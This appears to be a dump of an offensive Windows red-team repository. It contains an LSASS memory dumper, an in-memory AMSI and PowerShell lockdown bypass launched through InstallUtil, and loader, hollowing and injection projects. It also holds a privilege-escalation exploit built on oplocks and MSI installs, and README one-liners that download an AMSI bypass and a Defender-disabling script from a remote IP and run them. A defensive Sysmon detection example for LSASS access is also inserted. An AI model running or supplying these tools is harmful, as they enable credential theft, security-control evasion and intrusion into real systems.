$filePath = "C:\Windows\Tasks\lsass.dmp"
$dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read'
$result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$dumpFile.Close()

if($result) {
    Write-Host("Dumped LSASS memory to $filePath.")
}else {
    Write-Host("Error dumping LSASS memory.")
}

-------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/dll/dll.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; its XML tags did not survive extraction. Recoverable settings: ProjectGuid {567418BD-F614-46A1-AF01-66C28121F538}, OutputType Library, RootNamespace and AssemblyName dll, TargetFrameworkVersion v4.7.2, Debug/Release configurations for AnyCPU and x64, LangVersion 7.3.)
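The detection-side counterpart to `MiniDump.ps1` and `MiniDump.cs` above, as an added Python example that is not part of the repository: it reviews Sysmon Event ID 10 (ProcessAccess) records for handles opened to `lsass.exe` and flags the access masks those tools request (`0x1F0FFF`, and anything containing the `PROCESS_QUERY_INFORMATION | PROCESS_VM_READ` pair that `MiniDumpWriteDump` needs). The event records are constructed for the example, the flat `key=value` rendering is an assumption about how the events were exported, and the allowlist of legitimate readers is an assumed baseline to tune per environment.

```python
import re

# Added example (not part of the repository): review Sysmon Event ID 10 records for suspicious
# handles to lsass.exe, the artefact MiniDump.ps1 / MiniDump.cs leave behind.

# Process access rights from winnt.h
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
# MiniDumpWriteDump is documented to need exactly these two rights on the target handle
DUMP_MASK = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
# Never needed to read credentials, but needed to inject into LSASS
INJECT_MASK = PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# Assumed baseline of sources that legitimately read LSASS memory; tune per environment.
# Matching on path alone is spoofable, so a production rule should also check the signer.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Event ID 10 records for this example (flat key=value rendering); not real telemetry.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000 CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4",
    "EventID=10 SourceImage=C:\\Windows\\Tasks\\MiniDump.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1F0FFF CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\SYSTEM32\\dbghelp.dll+1c3e0|UNKNOWN(00007FFA1234)",
    "EventID=10 SourceImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\SYSTEM32\\KERNELBASE.dll+2c9fe|UNKNOWN(000001A5C7E20ABC)",
    "EventID=10 SourceImage=C:\\Program Files\\Windows Defender\\MsMpEng.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4",
    "EventID=10 SourceImage=C:\\Users\\user\\tool.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x0410 CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4",
    "EventID=10 SourceImage=C:\\Users\\user\\tool.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1F0FFF CallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4",
]

# A value runs until the next " key=" or the end of the record, so paths with spaces survive
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> dict:
    """Split one 'key=value key=value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def review_lsass_access(line: str):
    """Return (suspicious, reason) for one record."""
    ev = parse_event(line)
    if ev.get("EventID") != "10" or not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False, "not an lsass.exe access"
    if ev.get("SourceImage", "").lower() in ALLOWLIST:
        return False, "allowlisted source"
    access = int(ev.get("GrantedAccess", "0"), 16)
    trace = ev.get("CallTrace", "").lower()
    reasons = []
    if access & DUMP_MASK == DUMP_MASK:
        reasons.append("rights sufficient for MiniDumpWriteDump")
    if access & INJECT_MASK:
        reasons.append("write/thread rights on lsass")
    if "dbghelp.dll" in trace or "dbgcore.dll" in trace:
        reasons.append("minidump library in call trace")
    if "unknown(" in trace:  # Sysmon renders addresses not backed by a module as UNKNOWN(...)
        reasons.append("unbacked code in call trace")
    if not reasons:
        return False, "benign access mask"
    return True, "; ".join(reasons)


def triage(lines):
    """List (SourceImage, reason) for every suspicious record."""
    hits = []
    for line in lines:
        suspicious, reason = review_lsass_access(line)
        if suspicious:
            hits.append((parse_event(line)["SourceImage"], reason))
    return hits


if __name__ == "__main__":
    for source, reason in triage(SAMPLE_EVENTS):
        print(f"ALERT {source}: {reason}")
```

Three of the six records are flagged: the compiled `MiniDump.exe` (full access plus `dbghelp.dll` and unbacked code in the call trace), the PowerShell version (full access plus unbacked code, since the delegate built by `getDelegateType` is not backed by a file) and a minimal tool that asks for exactly `0x0410`. The `csrss.exe` record with `PROCESS_QUERY_LIMITED_INFORMATION` only and the allowlisted Defender engine are left alone, which is the balance a real rule has to strike: key on the rights and the call trace, not on the source image name, because the page's tools can be renamed at will.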
-------------------------------------------------------------------------------- /Loaders_Disk/clrunner/clrunner.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; its XML tags did not survive extraction. Recoverable settings: ProjectGuid {3D0468A8-B22E-4A3C-95A2-B973F1F8D3B1}, OutputType Exe, AssemblyName clrunner, TargetFrameworkVersion v4.7.2, x64 only, Release output path ..\..\payloads\Loaders_Memory\.)

-------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/test/test.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; XML tags lost. Recoverable settings: ProjectGuid {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}, OutputType Exe, AssemblyName test, TargetFrameworkVersion v4.7.2, AnyCPU and x64 configurations, LangVersion 7.3.)

-------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; XML tags lost. Recoverable settings: ProjectGuid {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}, OutputType Exe, AssemblyName MiniDump, TargetFrameworkVersion v4.7.2, x64 Release output path ..\..\payloads\Misc\ with DebugType none, LangVersion 7.3.)

-------------------------------------------------------------------------------- /AppLocker_Bypass/DLLRunner32/DLLRunner32_DN2JS.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; XML tags lost. Recoverable settings: ProjectGuid {D8337B89-8E8D-4F3F-9F82-3D1EC83810C1}, OutputType Library, AssemblyName DLLRunner32_DN2JS, TargetFrameworkVersion v4.7.2; Release builds go to payload_dir\x86_64\ (x64) and payload_dir\ (x86), LangVersion 7.3.)

-------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/exe/exe.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; XML tags lost. Recoverable settings: ProjectGuid {4D5A47FE-B129-4E48-987B-1D10E80F08B4}, OutputType Exe, AssemblyName exe, TargetFrameworkVersion v4.7.2, AnyCPU and x64 configurations, LangVersion 7.3.)

-------------------------------------------------------------------------------- /Privilege_Escalation/PrintSpoofer.NET/PrintSpoofer.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; XML tags lost. Recoverable settings: ProjectGuid {C91C8B29-82DF-49C0-986B-81182CF84E42}, OutputType Exe, AssemblyName PrintSpoofer, TargetFrameworkVersion v4.7.2, x64 Release output path ..\..\payloads\Privilege_Escalation\ with DebugType none, LangVersion 7.3.)

-------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/Builder/Builder.csproj: -------------------------------------------------------------------------------- 
(MSBuild project file; truncated.)
| 5 | Debug 6 | AnyCPU 7 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C} 8 | Exe 9 | Builder 10 | Builder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Loaders_Disk/clhollow/clhollow.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {9432CB8F-F42F-4588-89B8-B4C48C489BEB} 8 | Exe 9 | clhollow 10 | clhollow 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Loaders_Memory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Loaders_Disk/clinject/clinject.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {2A515F49-2C07-4747-A5EF-E47516D17C05} 8 | Exe 9 | clinject 10 | clinject 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 
| 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Loaders_Memory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /Misc/PSLessExec/PSLessExec.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A} 8 | Exe 9 | Fileless_Lateral_Movement 10 | Fileless Lateral Movement 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Misc\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /AppLocker_Bypass/DLLInject64/DLLInject64_DN2JS.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {86D0AA20-3C48-4B18-BD6C-79022279812A} 8 | Library 9 | Properties 10 | DLLInject64_DN2JS 11 | DLLInject64_DN2JS 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | none 27 | true 28 | payload_dir\x86_64\ 29 | TRACE 30 | prompt 31 | 4 32 | x64 33 | 34 | 35 | true 36 | bin\x64\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x64 40 
| 7.3 41 | prompt 42 | MinimumRecommendedRules.ruleset 43 | 44 | 45 | payload_dir\ 46 | TRACE 47 | true 48 | x64 49 | 7.3 50 | prompt 51 | MinimumRecommendedRules.ruleset 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | PreserveNewest 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/FileOpLock.cpp: -------------------------------------------------------------------------------- 1 | #include "FileOpLock.h" 2 | #include 3 | 4 | FileOpLock::FileOpLock(UserCallback cb): 5 | g_inputBuffer({ 0 }), g_outputBuffer({ 0 }), g_o({ 0 }), g_hFile(INVALID_HANDLE_VALUE), g_hLockCompleted(nullptr), g_wait(nullptr), _cb(cb) 6 | { 7 | g_inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 8 | g_inputBuffer.StructureLength = sizeof(g_inputBuffer); 9 | g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; 10 | g_inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; 11 | g_outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 12 | g_outputBuffer.StructureLength = sizeof(g_outputBuffer); 13 | } 14 | 15 | 16 | FileOpLock::~FileOpLock() 17 | { 18 | if (g_wait) 19 | { 20 | SetThreadpoolWait(g_wait, nullptr, nullptr); 21 | CloseThreadpoolWait(g_wait); 22 | g_wait = nullptr; 23 | } 24 | 25 | if (g_o.hEvent) 26 | { 27 | CloseHandle(g_o.hEvent); 28 | g_o.hEvent = nullptr; 29 | } 30 | 31 | if (g_hFile != INVALID_HANDLE_VALUE) 32 | { 33 | CloseHandle(g_hFile); 34 | g_hFile = INVALID_HANDLE_VALUE; 35 | } 36 | } 37 | 38 | bool FileOpLock::BeginLock(const std::wstring& filename, HANDLE p_provided) 39 | { 40 | g_hLockCompleted = CreateEvent(nullptr, TRUE, FALSE, nullptr); 41 | g_o.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr); 42 | 43 | 44 | if (p_provided != INVALID_HANDLE_VALUE) 45 | { 46 | g_hFile = p_provided; 47 | } 48 | else 49 | { 50 | g_hFile = CreateFileW(filename.c_str(), GENERIC_READ, 
FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 51 | 0, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_FLAG_BACKUP_SEMANTICS, 0); 52 | if (g_hFile == INVALID_HANDLE_VALUE) { 53 | 54 | return false; 55 | } 56 | } 57 | 58 | g_wait = CreateThreadpoolWait(WaitCallback, this, nullptr); 59 | if (g_wait == nullptr) 60 | { 61 | 62 | return false; 63 | } 64 | 65 | SetThreadpoolWait(g_wait, g_o.hEvent, nullptr); 66 | 67 | DeviceIoControl(g_hFile, FSCTL_REQUEST_OPLOCK, 68 | &g_inputBuffer, sizeof(g_inputBuffer), 69 | &g_outputBuffer, sizeof(g_outputBuffer), 70 | nullptr, &g_o); 71 | if (GetLastError() != ERROR_IO_PENDING) { 72 | 73 | return false; 74 | } 75 | 76 | return true; 77 | } 78 | 79 | FileOpLock* FileOpLock::CreateLock(const std::wstring& name, FileOpLock::UserCallback cb, HANDLE p_provided) 80 | { 81 | FileOpLock* ret = new FileOpLock(cb); 82 | 83 | if (ret->BeginLock(name, p_provided)) 84 | { 85 | return ret; 86 | } 87 | else 88 | { 89 | delete ret; 90 | return nullptr; 91 | } 92 | } 93 | 94 | void FileOpLock::WaitForLock(UINT Timeout) 95 | { 96 | WaitForSingleObject(g_hLockCompleted, Timeout); 97 | } 98 | 99 | void FileOpLock::WaitCallback(PTP_CALLBACK_INSTANCE Instance, 100 | PVOID Parameter, PTP_WAIT Wait, 101 | TP_WAIT_RESULT WaitResult) 102 | { 103 | UNREFERENCED_PARAMETER(Instance); 104 | UNREFERENCED_PARAMETER(Wait); 105 | UNREFERENCED_PARAMETER(WaitResult); 106 | 107 | FileOpLock* lock = reinterpret_cast(Parameter); 108 | 109 | lock->DoWaitCallback(); 110 | } 111 | 112 | void FileOpLock::DoWaitCallback() 113 | { 114 | DWORD dwBytes; 115 | if (!GetOverlappedResult(g_hFile, &g_o, &dwBytes, TRUE)) { 116 | 117 | } 118 | 119 | if (_cb) 120 | { 121 | _cb(); 122 | } 123 | 124 | 125 | CloseHandle(g_hFile); 126 | g_hFile = INVALID_HANDLE_VALUE; 127 | SetEvent(g_hLockCompleted); 128 | } -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/service/service.csproj: 
--------------------------------------------------------------------------------
(project file; the XML tags were lost in extraction. Values that survive: WinExe project `service`, .NET Framework v4.7.2, Debug/Release for AnyCPU and x64, x64 Release output to `bin\x64\Release\`, a `Component` item with `Service1.cs` as its dependent file)

--------------------------------------------------------------------------------
/Active_Directory/sql/.vs/sql/v16/Server/sqlite3/storage.ide:
--------------------------------------------------------------------------------
SQLite format 3 (binary Visual Studio state database; contents not shown)

--------------------------------------------------------------------------------
/Privilege_Escalation/PrintSpoofer.NET/.vs/PrintSpoofer/v16/Server/sqlite3/storage.ide:
--------------------------------------------------------------------------------
SQLite format 3 (binary Visual Studio state database; contents not shown)

--------------------------------------------------------------------------------
/Misc/README.md:
--------------------------------------------------------------------------------
# Miscellaneous

## ToC

| Application | Format | Notes |
| ----------- | ------ | ----- |
| `Autos` | PS | Scripts to automate things I found myself doing a lot |
| `AV_Stuff` | PS | Basic scripts for AV/AppLocker enumeration |
| `Fileless_Lateral_Movement` | EXE | PSExec-like tool utilizing remote service configuration for lateral movement |
| `MiniDump` | EXE/PS | A simple binary to dump LSASS to a file for offline examination |


## `Autos`
Scripts to automate things I found myself doing a lot.

### Tools
- `Create-Admin.ps1`
  - Create a local Administrator user on the box and enable RDP
  - Requires: High Integrity process
- `Compress-ScriptBlock.ps1`
  - Minify a PowerShell *ScriptBlock*. Pulled from [StartAutomating/PSMinifier](https://github.com/StartAutomating/PSMinifier)
  - Usage:
    ```ps1
    . .\Compress-ScriptBlock.ps1 # import it as a module
    $sb=get-command | select -ExpandProperty ScriptBlock # get the scriptblock for your target file
    Compress-ScriptBlock -ScriptBlock $sb >
    ```
  - Warning:
    - It's not perfect, I usually have to do a good amount of manual work
    - *Deletes default values for function parameters*


## `AV_Stuff`
Basic scripts for AV and AppLocker enumeration or disabling that I created with the help of online resources (all credited).

### `Disable-AVProduct.ps1`
Get the status of the Antivirus Product on local and remote computers, then, if Windows Defender is detected locally, disable as much of it as possible.
- Credits:
  - `SyncroMSP` at [mspscripts.com](https://mspscripts.com/get-installed-antivirus-information-2/) for `Get-LHSAntiVirusProduct()`
- References:
  - [learn.microsoft.com](https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware)
  - [jeremybeaume/tools](https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1)
  - [viperone.gitbook.io/pentest-everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/defense-evasion/disable-defender)
- Requires:
  - Admin privs to disable stuff; the enumeration part is fine without
- Usage:
  ```ps1
  powershell.exe -ExecutionPolicy Bypass -c "(new-object system.net.webclient).downloadstring('http://192.168.45.166/Disable-AVProduct.ps1') | IEX;"
  ```
- It doesn't get detected by my version of Defender (v4.18.1807.18075) since it's really all semi-normal functionality, but if you have AMSI problems just bypass it first
  ```ps1
  powershell.exe -ExecutionPolicy Bypass -c "(new-object system.net.webclient).downloadstring('http://192.168.45.166/amsi.txt') | IEX; (new-object system.net.webclient).downloadstring('http://192.168.45.166/Disable-AVProduct.ps1') | IEX;"
  ```

#### `Disable-AVProduct.min.ps1`
A more concise `Disable-AVProduct.ps1` for active use. Each function is contained entirely on a single line, no comments, etc. Not obfuscated, just smaller (almost half-sized).

Might have some bugs because of the minifying process. I've tested it a decent amount and it works but if something comes up lmk!

### `Get-AppLockerRules.ps1`

Enumerate AppLocker rules. Very basic, will update in future.


## `PSLessExec`

Wipes Windows Defender signatures on the *remote host* and uses a `PSExec`-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`.

### Usage

```
Usage: PSLessExec.exe [Target] [Service] [BinaryToRun]
Example: PSLessExec.exe appsrv01 SensorService notepad.exe
```

## `MiniDump`

A simple binary to dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as a native PowerShell script.

--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass.cs:
--------------------------------------------------------------------------------
```csharp
using System;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;
using System.Runtime.ExceptionServices;
using System.IO;

namespace loader
{

    public class MainClass
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern IntPtr GetStdHandle(int nStdHandle);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32.dll")] static extern void Sleep(uint dwMilliseconds);

        [HandleProcessCorruptedStateExceptions]
        public static void Main()
        {
            go();
        }

        [HandleProcessCorruptedStateExceptions]
        public static void go()
        {
            Char a1, a2, a3, a4, a5;
            a1 = 'y';
            a2 = 'g';
            a3 = 'u';
            a4 = 'o';
            a5 = 't';
            var Automation = typeof(System.Management.Automation.Alignment).Assembly;
            var get_l_info = Automation.GetType("S" + a1 + "stem.Mana" + a2 + "ement.Au" + a5 + "oma" + a5 + "ion.Sec" + a3 + "rity.S"+ a1 + "stemP" + a4 + "licy").GetMethod("GetS" + a1 + "stemL" + a4 + "ckdownP" + a4 + "licy", System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.Static);
            var get_l_handle = get_l_info.MethodHandle;
            uint lpflOldProtect;

            RuntimeHelpers.PrepareMethod(get_l_handle);
            var get_l_ptr = get_l_handle.GetFunctionPointer();

            VirtualProtect(get_l_ptr, new UIntPtr(4), 0x40, out lpflOldProtect);

            var new_instr = new byte[] { 0x48, 0x31, 0xc0, 0xc3 };

            Marshal.Copy(new_instr, 0, get_l_ptr, 4);
            string[] filePaths = Directory.GetFiles(@"c:\wind" + a4 + "ws\\s" + a1 + "stem32", "a?s?.d*");
            string libname = (filePaths[0].Substring(filePaths[0].Length - 8));
            try
            {
                var lib = LoadLibrary(libname);
                Char c1, c2, c3, c4, c5, c6, c7, c8;
                c1 = 'A';
                c2 = 's';
                c3 = 'c';
                c4 = 'n';
                c5 = 'l';
                c6 = 't';
                c7 = 'z';
                c8 = 'U';
                var baseaddr = GetProcAddress(lib, c1 + "m" + c2 + "i" + c8 + "a" + c3 + "I" + c4 + "i" + c6 + "ia" + c5 + "i" + c7 + "e");
                var funcaddr = baseaddr - 96;
                VirtualProtect(funcaddr, new UIntPtr(8), 0x40, out lpflOldProtect);
                Marshal.Copy(new byte[] { 0x90, 0xC3 }, 0, funcaddr, 2);
                funcaddr = baseaddr - 352;
                VirtualProtect(funcaddr, new UIntPtr(8), 0x40, out lpflOldProtect);
                Marshal.Copy(new byte[] { 0x90, 0xC3 }, 0, funcaddr, 2);
            }
            catch
            {
                Console.WriteLine("Could not patch " + libname + "...");
            }


            string[] cmd = new string[] { "while ($true){$cmd = Read-Host -Prompt \"PS>\"; if ($cmd -Contains \"exit\") { break} else { iex $cmd; \"`n\"}}" };
            while (true)
            {
                Microsoft.PowerShell.ConsoleShell.Start(System.Management.Automation.Runspaces.RunspaceConfiguration.Create(), "Banner", "Help", cmd);
                break;
            }
        }
    }

    // InstallUtil uninstall bypass
    [System.ComponentModel.RunInstaller(true)]
    public class Loader : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            base.Uninstall(savedState);
            MainClass.go();
        }
    }
}
```

--------------------------------------------------------------------------------
/AppLocker_Bypass/psBypass/psbypass.csproj:
--------------------------------------------------------------------------------
(project file; the XML tags were lost in extraction. Values that survive: Exe project, root namespace `examine`, assembly name `psbypass`, .NET Framework v4.7.2, Debug/Release for AnyCPU and x64, x64 Release output to `..\..\payloads\AppLocker_Bypass\`, and two non-private references resolved from the GAC: `..\..\..\..\..\..\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll` and `..\..\..\..\..\..\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll`)

--------------------------------------------------------------------------------
/Active_Directory/sql/sql.csproj:
--------------------------------------------------------------------------------
(project file; the XML tags were lost in extraction. Values that survive: Exe project `sql`, .NET Framework v4.7.2, Debug/Release for AnyCPU, x64 and x86, x64 Release output to `..\..\payloads\Active_Directory\`, x86 Release output to `bin\x86\Release\`)
bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | ..\..\payloads\Active_Directory\ 47 | TRACE 48 | true 49 | none 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | true 57 | bin\x86\Debug\ 58 | DEBUG;TRACE 59 | full 60 | x86 61 | 7.3 62 | prompt 63 | true 64 | 65 | 66 | bin\x86\Release\ 67 | TRACE 68 | true 69 | pdbonly 70 | x86 71 | 7.3 72 | prompt 73 | true 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/src/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "popl.hpp" 10 | #include "FileOpLock.h" 11 | #include "exploit.h" 12 | typedef int __missing_type__; 13 | 14 | #if !defined(_COM_SMARTPTR) 15 | #if !defined(_INC_COMIP) 16 | #include 17 | #endif 18 | #define _COM_SMARTPTR _com_ptr_t 19 | #define _COM_SMARTPTR_LEVEL2 _com_IIID 20 | #endif 21 | #if defined(_COM_SMARTPTR) 22 | #if !defined(_COM_SMARTPTR_TYPEDEF) 23 | #if defined(_COM_SMARTPTR_LEVEL2) 24 | #define _COM_SMARTPTR_TYPEDEF(Interface, IID) \ 25 | typedef _COM_SMARTPTR<_COM_SMARTPTR_LEVEL2 > \ 26 | Interface ## Ptr 27 | #else 28 | #define _COM_SMARTPTR_TYPEDEF(Interface, IID) \ 29 | typedef _COM_SMARTPTR \ 30 | Interface ## Ptr 31 | #endif 32 | #endif 33 | #endif 34 | namespace 35 | { 36 | bool install_msi(const std::string& p_msi_path, const std::string& p_install_path) 37 | { 38 | MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL); 39 | 40 | std::string properties("ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR="); 41 | properties.append(p_install_path); 42 | std::cout << "[+] MSI install: " << properties << " " << p_msi_path << std::endl; 43 | int result = MsiInstallProductA(p_msi_path.c_str(), properties.c_str()); 44 | std::cout << "[+] 
MsiInstallProductA return value: " << result << std::endl; 45 | return (result == 1603); 46 | } 47 | } 48 | class __declspec(uuid("4d40ca7e-d22e-4b06-abbc-4defecf695d8")) IFoo : public IUnknown { 49 | public: 50 | virtual HRESULT __stdcall Method(); 51 | }; 52 | _COM_SMARTPTR_TYPEDEF(IFoo, __uuidof(IFoo)); 53 | 54 | void StartElevationSvc() { 55 | 56 | IFoo* pObject; 57 | struct __declspec(uuid("1FCBE96C-1697-43AF-9140-2897C7C69767")) CLSID_Object; 58 | CoInitialize(NULL); 59 | CoCreateInstance(__uuidof(CLSID_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IFoo), reinterpret_cast(&pObject)); 60 | CoUninitialize(); 61 | return; 62 | } 63 | int main(int p_argc, char* p_argv[]) 64 | { 65 | popl::OptionParser op("Allowed options"); 66 | auto help_option = op.add("h", "help", "produce help message"); 67 | auto msi_path = op.add, popl::Attribute::required>("m", "msi_path", "The path to the MSI to install"); 68 | auto i_path = op.add, popl::Attribute::required>("i", "install_path", "The path to install to"); 69 | auto copy_path = op.add, popl::Attribute::required>("c", "copy_path", "The file to copy to the target path"); 70 | auto target_path = op.add, popl::Attribute::required>("p", "target_path", "The file to create"); 71 | 72 | try 73 | { 74 | op.parse(p_argc, p_argv); 75 | } 76 | catch (std::exception& e) 77 | { 78 | std::cout << e.what() << std::endl; 79 | std::cout << op << std::endl; 80 